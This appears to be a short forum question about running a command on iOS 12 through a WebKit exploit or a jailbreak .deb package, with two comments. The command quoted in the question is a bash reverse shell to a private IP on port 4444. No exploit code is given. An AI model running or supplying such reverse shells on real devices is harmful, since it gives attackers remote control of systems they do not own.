# how to execution commands through a WebKit exploit for iOS 12?

Tags: ios, security, jailbreak

Is it possible to run the command
`bash &> /dev/tcp/192.168.1.66/4444 0>&1`
Through a WebKit exploit for iOS 12 or a .deb package for a jailbroken device

this was achieved on iOS 9.3.3 using that Verisions WebKit exploit and wanting to know if I can do the same for his 12.0.1

Comment: Sorry, but it's not clear from your question what you're trying to achieve. Running that command is definitely possible from a deb package, as it will be installed on an already jailbroken device with bash. Running that from WebKit requires exploiting a vulnerability chain that might either exist or not.

Comment: I tried to run it though a deb package on a jailbroken phone to no avail